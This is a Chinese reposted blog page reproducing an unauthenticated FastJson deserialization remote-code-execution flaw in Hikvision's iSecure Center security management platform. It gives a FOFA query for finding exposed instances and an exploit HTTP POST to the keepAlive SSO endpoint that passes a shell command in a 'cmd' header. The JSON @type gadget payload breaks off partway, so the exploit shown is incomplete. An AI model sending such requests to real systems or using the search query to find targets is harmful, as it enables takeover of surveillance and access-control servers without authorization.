首页 前端知识 海康威视综合安防管理平台 多处 FastJson反序列化RCE漏洞复现

海康威视综合安防管理平台 多处 FastJson反序列化RCE漏洞复现

2024-06-19 08:06:37 前端知识 前端哥 559 132 我要收藏

0x01 产品简介

海康威视综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。海康威视集成化综合管理软件平台,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。

0x02 漏洞概述

由于海康威视综合安防管理平台使用了低版本的fastjson,攻击者可在未鉴权情况下获取服务器权限,且由于存在相关依赖,即使服务器不出网无法远程加载恶意类也可通过本地链直接命令执行,从而获取服务器权限。

0x03 复现环境

FOFA:app="HIKVISION-iSecure-Center"

0x04 漏洞复现

Exp-1

POST /bic/ssoService/v1/keepAlive HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/json
cmd: dir

{"CTGT":{ "a": {"@type": "java.lang
转载请注明出处或者链接地址:https://www.qianduange.cn//article/12825.html
标签
web安全
评论
发布的文章

JQuery中的load()、$

2024-05-10 08:05:15

大家推荐的文章
会员中心 联系我 留言建议 回顶部
复制成功!